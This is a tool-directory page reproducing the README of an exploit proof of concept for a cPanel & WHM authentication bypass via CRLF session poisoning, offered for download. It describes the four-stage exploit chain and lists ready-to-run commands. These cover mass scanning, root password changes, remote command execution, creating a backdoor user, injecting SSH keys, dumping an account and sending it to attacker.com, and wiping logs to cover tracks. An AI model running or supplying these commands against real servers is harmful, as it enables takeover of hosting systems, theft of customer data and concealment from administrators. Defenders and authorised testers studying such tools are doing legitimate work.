Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-41940-Exploit-PoC — Exploit PoC for CVE-2026-41940, a cPanel & WHM authentication bypass via CRLF injection. Includes mass scanning, post-exploitation actions, and an interactive shell for authorized testing. | Kitploit
Tools/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
Authentication & AuthorizationVulnerability ScannersExploitationWeb Application ExploitationPost-ExploitationPenetration TestingRed TeamingPayload Development

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHubishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

Exploit PoC for CVE-2026-41940, a cPanel & WHM authentication bypass via CRLF injection. Includes mass scanning, post-exploitation actions, and an interactive shell for authorized testing.

View RepositoryWebsite
21275 months agoNot yet reviewed

CVE-2026-41940 Exploit PoC – cPanel & WHM Authentication Bypass

CVE-2026-41940 CVSS Go Version License

Tool by: Ishan Oshada | GitHub

⚠️ FOR AUTHORIZED SECURITY TESTING ONLY. Unauthorized use is illegal.

1


📋 Table of Contents

  • Vulnerability Overview
  • Exploit Chain
  • Features
  • Installation
  • Quick Start
  • Usage Examples
  • Post-Exploit Actions
  • Interactive Shell Commands
  • Mass Scanning with urls.txt
  • Output Examples
  • Options Reference
  • Affected Versions
  • Building for All Platforms
  • FAQ & Troubleshooting
  • Disclaimer
  • Author

2

Vulnerability Overview

CVE-2026-41940 is a CRLF injection vulnerability in cPanel & WHM (versions < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

The saveSession() function writes session data after applying filter_sessiondata(), but the filter is applied too late. By injecting CRLF (\r\n) characters inside the Authorization: Basic header, an attacker can poison the on‑disk session file with arbitrary key‑value pairs (e.g., hasroot=1, tfa_verified=1, user=root).

When the poisoned session is later loaded, cPanel/WHM grants full root access without any password.

CVSS Score: 10.0 (CRITICAL)

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Confidentiality: High
  • Integrity: High
  • Availability: High

Exploit Chain (4 Stages)

StageActionDescription
1POST /login/?login_only=1Request pre‑auth session cookie with wrong credentials
2GET / + CRLF Authorization headerPoison the session file with hasroot=1, user=root, etc.
3GET /scripts2/listacctsForce session cache to reload poisoned file (propagation)
4GET /cpsess<TOKEN>/json-api/versionVerify root access – success = 200 + version data

Features

  • ✅ Single & mass scanning (file input, stdin pipe)
  • ✅ Threaded scanning (control concurrency up to 100+ threads)
  • ✅ Verbose mode (--verbose) – shows full HTTP requests/responses
  • ✅ JSON output (auto‑saves when a vulnerable target is found)
  • ✅ 10 post‑exploit actions (see table below)
  • ✅ Cross-platform (Windows, Linux, macOS)
  • ✅ No external dependencies (only Go standard library)
  • ✅ Colourful terminal output with clear boxed results
  • ✅ Session persistence – keep-alive mechanism
  • ✅ Interactive WHM shell with command history

Installation

Prerequisites

  • Go 1.20 or higher (Download)

Clone Repository

git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

Build Executable

Windows

go build -o cpanel_sniper.exe main.go

Linux / macOS

go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

Run Directly (No Build)

go run main.go -u https://target.com:2087

Pre-built Binaries (Fastest Way)

Instead of building from source, you can download the latest stable executables directly from the repository. These are automatically generated for every update:

PlatformLocation
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper

Note: If using Linux or macOS, remember to grant execution permissions after downloading:


Quick Start

# Basic scan
go run main.go -u https://target.com:2087

# List all cPanel accounts
go run main.go -u https://target.com:2087 -action list

# Interactive WHM shell
go run main.go -u https://target.com:2087 -action shell

# Mass scan with urls.txt
go run main.go -l urls.txt -t 20 -o results.json

Usage Examples (Table)

#PurposeCommand
1Basic single target scango run main.go -u https://target.com:2087
2List all cPanel accountsgo run main.go -u https://target.com:2087 -action list
3Change root passwordgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4Execute system commandgo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5Get server informationgo run main.go -u https://target.com:2087 -action info
6Create backdoor usergo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7Create API token (stealthy)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8Inject SSH keygo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9Dump & exfiltrate accountgo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10Wipe logs & cover tracksgo run main.go -u https://target.com:2087 -action wipe
11Interactive WHM shellgo run main.go -u https://target.com:2087 -action shell
12Mass scan from filego run main.go -l urls.txt -t 20 -o results.json
13Save results to JSONgo run main.go -u https://target.com:2087 -o scan_results.json
14Enable verbose debugginggo run main.go -u https://target.com:2087 --verbose
15Pipe from other toolscat urls.txt | go run main.go -t 20
16Increase timeoutgo run main.go -u https://target.com:2087 -timeout 30

Post-Exploit Actions

Download Tool